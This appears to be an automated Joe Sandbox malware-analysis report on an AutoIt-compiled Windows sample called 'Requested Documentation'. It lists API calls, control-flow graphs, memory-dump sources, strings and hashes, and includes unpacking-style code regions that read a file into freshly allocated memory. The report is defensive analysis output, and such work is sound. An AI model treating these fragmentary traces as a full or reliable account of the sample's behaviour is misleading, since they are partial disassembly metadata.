                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                                              • API String ID: 529118366-3287110873
                                                                              • Opcode ID: 19d1c4ffff04a1ddd59a1a6bb315e1a484593091c687c9bba2c8d759e548b81b
                                                                              • Instruction ID: f80f4873316e6aef7d3d30176818bee6a6dc5ccc0c54796f9baec0f611ffd47e
                                                                              • Opcode Fuzzy Hash: 19d1c4ffff04a1ddd59a1a6bb315e1a484593091c687c9bba2c8d759e548b81b
                                                                              • Instruction Fuzzy Hash: 4251D479D04148AFDF11FBF4DC05AEDBB78AFC5710F108466F861B6262DAA18606CB21

                                                                              Control-flow Graph

APIs
• GetVersionExW.KERNEL32(?), ref: 009849CD
  • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
• GetCurrentProcess.KERNEL32(?,00A0FAEC,00000000,00000000,?), ref: 00984A9A
• IsWow64Process.KERNEL32(00000000), ref: 00984AA1
• GetNativeSystemInfo.KERNELBASE(00000000), ref: 00984AE7
• FreeLibrary.KERNEL32(00000000), ref: 00984AF2
• GetSystemInfo.KERNEL32(00000000), ref: 00984B23
• GetSystemInfo.KERNEL32(00000000), ref: 00984B2F
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0

Control-flow Graph
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00984D8E,?,?,00000000,00000000), ref: 00984E99
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00984D8E,?,?,00000000,00000000), ref: 00984EB0
• LoadResource.KERNEL32(?,00000000,?,?,00984D8E,?,?,00000000,00000000,?,?,?,?,?,?,00984E2F), ref: 009BD937
• SizeofResource.KERNEL32(?,00000000,?,?,00984D8E,?,?,00000000,00000000,?,?,?,?,?,?,00984E2F), ref: 009BD94C
• LockResource.KERNEL32(00984D8E,?,?,00984D8E,?,?,00000000,00000000,?,?,?,?,?,?,00984E2F,00000000), ref: 009BD95F
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
APIs
• GetFileAttributesW.KERNELBASE(?,009BE398), ref: 009E446A
• FindFirstFileW.KERNELBASE(?,?), ref: 009E447B
• FindClose.KERNEL32(00000000), ref: 009E448B
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
Strings
• Variable must be of type 'Object'., xrefs: 009C3E62
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990A5B
• timeGetTime.WINMM ref: 00990D16
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990E53
• Sleep.KERNEL32(0000000A), ref: 00990E61
• LockWindowUpdate.USER32(00000000,?,?), ref: 00990EFA
• DestroyWindow.USER32 ref: 00990F06
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00990F20
• Sleep.KERNEL32(0000000A,?,?), ref: 009C4E83
• TranslateMessage.USER32(?), ref: 009C5C60
• DispatchMessageW.USER32(?), ref: 009C5C6E
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009C5C82
Similarity
• API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
• String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 4212290369-3242690629

Control-flow Graph

APIs
  • Part of subcall function 009E8F5F: __time64.LIBCMT ref: 009E8F69
  • Part of subcall function 00984EE5: _fseek.LIBCMT ref: 00984EFD
• __wsplitpath.LIBCMT ref: 009E9234
  • Part of subcall function 009A40FB: __wsplitpath_helper.LIBCMT ref: 009A413B
• _wcscpy.LIBCMT ref: 009E9247
• _wcscat.LIBCMT ref: 009E925A
• __wsplitpath.LIBCMT ref: 009E927F
• _wcscat.LIBCMT ref: 009E9295
• _wcscat.LIBCMT ref: 009E92A8
  • Part of subcall function 009E8FA5: _memmove.LIBCMT ref: 009E8FDE
  • Part of subcall function 009E8FA5: _memmove.LIBCMT ref: 009E8FED
• _wcscmp.LIBCMT ref: 009E91EF
  • Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9824
  • Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9837
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E9452
• _wcsncpy.LIBCMT ref: 009E94C5
• DeleteFileW.KERNEL32(?,?), ref: 009E94FB
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009E9511
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E9522
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E9534
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00983074
• RegisterClassExW.USER32(00000030), ref: 0098309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
• InitCommonControlsEx.COMCTL32(?), ref: 009830CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
• LoadIconW.USER32(000000A9), ref: 009830F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915

Control-flow Graph

APIs
  • Part of subcall function 00984706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A452F8,?,009837AE,?), ref: 00984724
  • Part of subcall function 009A050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00987165), ref: 009A052D
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009871A8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009BE8C8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009BE909
• RegCloseKey.ADVAPI32(?), ref: 009BE947
• _wcscat.LIBCMT ref: 009BE9A0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                              • API String ID: 2673923337-2727554177
                                                                              • Opcode ID: daad580a3b446230c24929a572420261cc0a5dd6b39506f5f729bbb33d06e8cf
                                                                              • Instruction ID: 39db3665052ba19d8f5775df0e27b2131c85f7a12041a558611cb099564eb821
                                                                              • Opcode Fuzzy Hash: daad580a3b446230c24929a572420261cc0a5dd6b39506f5f729bbb33d06e8cf
                                                                              • Instruction Fuzzy Hash: A9718579904301AEC710EFA5E841ADBB7E8FFC6310B50492EF445972A0DBB2D549CB92

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00983A50
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00983A5F
                                                                              • LoadIconW.USER32(00000063), ref: 00983A76
                                                                              • LoadIconW.USER32(000000A4), ref: 00983A88
                                                                              • LoadIconW.USER32(000000A2), ref: 00983A9A
                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AC0
                                                                              • RegisterClassExW.USER32(?), ref: 00983B16
                                                                                • Part of subcall function 00983041: GetSysColorBrush.USER32(0000000F), ref: 00983074
                                                                                • Part of subcall function 00983041: RegisterClassExW.USER32(00000030), ref: 0098309E
                                                                                • Part of subcall function 00983041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
                                                                                • Part of subcall function 00983041: InitCommonControlsEx.COMCTL32(?), ref: 009830CC
                                                                                • Part of subcall function 00983041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
                                                                                • Part of subcall function 00983041: LoadIconW.USER32(000000A9), ref: 009830F2
                                                                                • Part of subcall function 00983041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$AutoIt v3
                                                                              • API String ID: 423443420-4155596026
                                                                              • Opcode ID: d64f70a71f36dc2294f9ca50129ac833a9e19d996f977d6f14a0310dc37e22f7
                                                                              • Instruction ID: 1a3e7d52254374366d834e5c62051065350d2b63160fff9432ffb41a7e704d6e
                                                                              • Opcode Fuzzy Hash: d64f70a71f36dc2294f9ca50129ac833a9e19d996f977d6f14a0310dc37e22f7
                                                                              • Instruction Fuzzy Hash: 95214BB8D00708EFEB11DFF4EC09B9D7BB4FB4A711F00412AE500A62A2D3B656428F85

                                                                              Control-flow Graph

                                                                              control_flow_graph 767 983633-983681 769 9836e1-9836e3 767->769 770 983683-983686 767->770 769->770 771 9836e5 769->771 772 983688-98368f 770->772 773 9836e7 770->773 774 9836ca-9836d2 DefWindowProcW 771->774 777 98374b-983753 PostQuitMessage 772->777 778 983695-98369a 772->778 775 9836ed-9836f0 773->775 776 9bd0cc-9bd0fa call 991070 call 991093 773->776 782 9836d8-9836de 774->782 783 9836f2-9836f3 775->783 784 983715-98373c SetTimer RegisterWindowMessageW 775->784 810 9bd0ff-9bd106 776->810 781 983711-983713 777->781 779 9836a0-9836a2 778->779 780 9bd154-9bd168 call 9e2527 778->780 787 9836a8-9836ad 779->787 788 983755-983764 call 9844a0 779->788 780->781 804 9bd16e 780->804 781->782 791 9836f9-98370c KillTimer call 98443a call 983114 783->791 792 9bd06f-9bd072 783->792 784->781 789 98373e-983749 CreatePopupMenu 784->789 794 9bd139-9bd140 787->794 795 9836b3-9836b8 787->795 788->781 789->781 791->781 798 9bd0a8-9bd0c7 MoveWindow 792->798 799 9bd074-9bd076 792->799 794->774 809 9bd146-9bd14f call 9d7c36 794->809 802 9836be-9836c4 795->802 803 9bd124-9bd134 call 9e2d36 795->803 798->781 806 9bd078-9bd07b 799->806 807 9bd097-9bd0a3 SetFocus 799->807 802->774 802->810 803->781 804->774 806->802 811 9bd081-9bd092 call 991070 806->811 807->781 809->774 810->774 816 9bd10c-9bd11f call 98443a call 98434a 810->816 811->781 816->774
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 009836D2
                                                                              • KillTimer.USER32(?,00000001), ref: 009836FC
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0098371F
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0098372A
                                                                              • CreatePopupMenu.USER32 ref: 0098373E
                                                                              • PostQuitMessage.USER32(00000000), ref: 0098374D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                              • String ID: TaskbarCreated
                                                                              • API String ID: 129472671-2362178303
                                                                              • Opcode ID: 0d14fa86fafbe3e04b994bf9ba628f269bc040a02b4e1bbfa51ea372d35027df
                                                                              • Instruction ID: 2bea12679bd4f9f69483be5bb94a5f3dd8ccbca035275ca515438c31a36741a5
                                                                              • Opcode Fuzzy Hash: 0d14fa86fafbe3e04b994bf9ba628f269bc040a02b4e1bbfa51ea372d35027df
                                                                              • Instruction Fuzzy Hash: 16415BB9500509BBDF24BFBCDC0ABBD375CEB81700F104925F502963A2EAA6DD429762

                                                                              Control-flow Graph

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                              • API String ID: 1825951767-3513169116
                                                                              • Opcode ID: 0a0fbdb080ec0dab5f9cc8b79f791412f2b1cadc8cc9142cd38d53957109f976
                                                                              • Instruction ID: 3ab42d32f36bc2e9a863a40add250f0db3ddc500029471ea5fee000018ab9d1e
                                                                              • Opcode Fuzzy Hash: 0a0fbdb080ec0dab5f9cc8b79f791412f2b1cadc8cc9142cd38d53957109f976
                                                                              • Instruction Fuzzy Hash: A0A15E7690021D9BCB14FBA4DC51AEEB778BF95710F44442AE415B7292EF749A08CBA0

                                                                              Control-flow Graph

                                                                              control_flow_graph 942 13025d0-130267e call 1300000 945 1302685-13026ab call 13034e0 CreateFileW 942->945 948 13026b2-13026c2 945->948 949 13026ad 945->949 954 13026c4 948->954 955 13026c9-13026e3 VirtualAlloc 948->955 950 13027fd-1302801 949->950 952 1302843-1302846 950->952 953 1302803-1302807 950->953 956 1302849-1302850 952->956 957 1302813-1302817 953->957 958 1302809-130280c 953->958 954->950 959 13026e5 955->959 960 13026ea-1302701 ReadFile 955->960 961 1302852-130285d 956->961 962 13028a5-13028ba 956->962 963 1302827-130282b 957->963 964 1302819-1302823 957->964 958->957 959->950 969 1302703 960->969 970 1302708-1302748 VirtualAlloc 960->970 971 1302861-130286d 961->971 972 130285f 961->972 965 13028ca-13028d2 962->965 966 13028bc-13028c7 VirtualFree 962->966 967 130283b 963->967 968 130282d-1302837 963->968 964->963 966->965 967->952 968->967 969->950 973 130274a 970->973 974 130274f-130276a call 1303730 970->974 975 1302881-130288d 971->975 976 130286f-130287f 971->976 972->962 973->950 982 1302775-130277f 974->982 979 130289a-13028a0 975->979 980 130288f-1302898 975->980 978 13028a3 976->978 978->956 979->978 980->978 983 1302781-13027b0 call 1303730 982->983 984 13027b2-13027c6 call 1303540 982->984 983->982 990 13027c8 984->990 991 13027ca-13027ce 984->991 990->950 992 13027d0-13027d4 CloseHandle 991->992 993 13027da-13027de 991->993 992->993 994 13027e0-13027eb VirtualFree 993->994 995 13027ee-13027f7 993->995 994->995 995->945 995->950
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013026A1
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013028C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                              • Instruction ID: c91bb44abb047a58325c02db1d3e135f70b7c6a3440704e9a7134e872ef1c675
                                                                              • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                              • Instruction Fuzzy Hash: D5A10A74E00209EBDB15CFA4C9A8BEEBBB5BF48708F208159E511BB2C1D7759A41CB54

                                                                              Control-flow Graph

                                                                              control_flow_graph 1073 9839d5-983a45 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A03
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A24
                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00983A38
                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00983A41
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: c7b65cf16f3c7f613b2a91a1ca34bbc6dd0fdddc9952165d83fcd9f6e69def2e
                                                                              • Instruction ID: a72c38e34deac92a7a221df717a54191c91d8ca28b07bad4e7e5b71e7b632c7d
                                                                              • Opcode Fuzzy Hash: c7b65cf16f3c7f613b2a91a1ca34bbc6dd0fdddc9952165d83fcd9f6e69def2e
                                                                              • Instruction Fuzzy Hash: E4F030789402947FEA3197A76C08EA73E7DE7C7F50B00002AB900B21B1C1E24C02CA70

                                                                              Control-flow Graph

                                                                              control_flow_graph 1074 13023b0-13024d1 call 1300000 call 13022a0 CreateFileW 1081 13024d3 1074->1081 1082 13024d8-13024e8 1074->1082 1083 1302588-130258d 1081->1083 1085 13024ea 1082->1085 1086 13024ef-1302509 VirtualAlloc 1082->1086 1085->1083 1087 130250b 1086->1087 1088 130250d-1302524 ReadFile 1086->1088 1087->1083 1089 1302526 1088->1089 1090 1302528-1302562 call 13022e0 call 13012a0 1088->1090 1089->1083 1095 1302564-1302579 call 1302330 1090->1095 1096 130257e-1302586 ExitProcess 1090->1096 1095->1096 1096->1083
                                                                              APIs
                                                                                • Part of subcall function 013022A0: Sleep.KERNELBASE(000001F4), ref: 013022B1
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013024C7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: H6NCX5XIIMP68J0GAZ
                                                                              • API String ID: 2694422964-3600963330
                                                                              • Opcode ID: 17fb3d410e0bf0abfef8aff6d3f3b3525262bde8e220689b49bff0ffc1fa4a8a
                                                                              • Instruction ID: 7d98277e2311b55766fdb8fba96a54ba1adaac563697762be3ef63621c63bbcd
                                                                              • Opcode Fuzzy Hash: 17fb3d410e0bf0abfef8aff6d3f3b3525262bde8e220689b49bff0ffc1fa4a8a
                                                                              • Instruction Fuzzy Hash: 70515371D04249DBEF12D7A4C818BEFBBB9AF15304F044199E605B72C1D67A0B49CB65

                                                                              Control-flow Graph

                                                                              control_flow_graph 1098 98407c-984092 1099 984098-9840ad call 987a16 1098->1099 1100 98416f-984173 1098->1100 1103 9bd3c8-9bd3d7 LoadStringW 1099->1103 1104 9840b3-9840d3 call 987bcc 1099->1104 1106 9bd3e2-9bd3fa call 987b2e call 986fe3 1103->1106 1104->1106 1108 9840d9-9840dd 1104->1108 1116 9840ed-98416a call 9a2de0 call 98454e call 9a2dbc Shell_NotifyIconW call 985904 1106->1116 1120 9bd400-9bd41e call 987cab call 986fe3 call 987cab 1106->1120 1110 9840e3-9840e8 call 987b2e 1108->1110 1111 984174-98417d call 988047 1108->1111 1110->1116 1111->1116 1116->1100 1120->1116
                                                                              APIs
                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009BD3D7
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              • _memset.LIBCMT ref: 009840FC
                                                                              • _wcscpy.LIBCMT ref: 00984150
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00984160
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                              • String ID: Line:
                                                                              • API String ID: 3942752672-1585850449
                                                                              • Opcode ID: 1a829628ecd419efee06bc62c3ab7363a61c90a1e47d9816795f92339e853ddc
                                                                              • Instruction ID: 3d9897d6e32a22f5824d3a7fab5c9b4e1280d46912aeaf1a3709def3850f3dc9
                                                                              • Opcode Fuzzy Hash: 1a829628ecd419efee06bc62c3ab7363a61c90a1e47d9816795f92339e853ddc
                                                                              • Instruction Fuzzy Hash: 7931D075408305AFD321FBA0DC45FDBB7DCAF84304F20491AF585962A2EBB4D649CB92

                                                                              Control-flow Graph

                                                                              control_flow_graph 1133 9a541d-9a5436 1134 9a5438-9a543d 1133->1134 1135 9a5453 1133->1135 1134->1135 1136 9a543f-9a5441 1134->1136 1137 9a5455-9a545b 1135->1137 1138 9a545c-9a5461 1136->1138 1139 9a5443-9a5448 call 9a8b28 1136->1139 1140 9a546f-9a5473 1138->1140 1141 9a5463-9a546d 1138->1141 1151 9a544e call 9a8db6 1139->1151 1144 9a5483-9a5485 1140->1144 1145 9a5475-9a5480 call 9a2de0 1140->1145 1141->1140 1143 9a5493-9a54a2 1141->1143 1149 9a54a9 1143->1149 1150 9a54a4-9a54a7 1143->1150 1144->1139 1148 9a5487-9a5491 1144->1148 1145->1144 1148->1139 1148->1143 1153 9a54ae-9a54b3 1149->1153 1150->1153 1151->1135 1155 9a54b9-9a54c0 1153->1155 1156 9a559c-9a559f 1153->1156 1157 9a54c2-9a54ca 1155->1157 1158 9a5501-9a5503 1155->1158 1156->1137 1157->1158 1161 9a54cc 1157->1161 1159 9a556d-9a556e call 9b0ba7 1158->1159 1160 9a5505-9a5507 1158->1160 1170 9a5573-9a5577 1159->1170 1163 9a552b-9a5536 1160->1163 1164 9a5509-9a5511 1160->1164 1165 9a55ca 1161->1165 1166 9a54d2-9a54d4 1161->1166 1173 9a553a-9a553d 1163->1173 1174 9a5538 1163->1174 1171 9a5513-9a551f 1164->1171 1172 9a5521-9a5525 1164->1172 1169 9a55ce-9a55d7 1165->1169 1167 9a54db-9a54e0 1166->1167 1168 9a54d6-9a54d8 1166->1168 1175 9a54e6-9a54ff call 9b0cc8 1167->1175 1176 9a55a4-9a55a8 1167->1176 1168->1167 1169->1137 1170->1169 1177 9a5579-9a557e 1170->1177 1178 9a5527-9a5529 1171->1178 1172->1178 1173->1176 1179 9a553f-9a554b call 9a46e6 call 9b0e5b 1173->1179 1174->1173 1193 9a5562-9a556b 1175->1193 1182 9a55ba-9a55c5 call 9a8b28 1176->1182 1183 9a55aa-9a55b7 call 9a2de0 1176->1183 1177->1176 1181 9a5580-9a5591 1177->1181 1178->1173 1194 9a5550-9a5555 1179->1194 1188 9a5594-9a5596 1181->1188 1182->1151 1183->1182 1188->1155 1188->1156 1193->1188 1195 9a555b-9a555e 1194->1195 1196 9a55dc-9a55e0 1194->1196 1195->1165 1197 9a5560 1195->1197 1196->1169 1197->1193
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
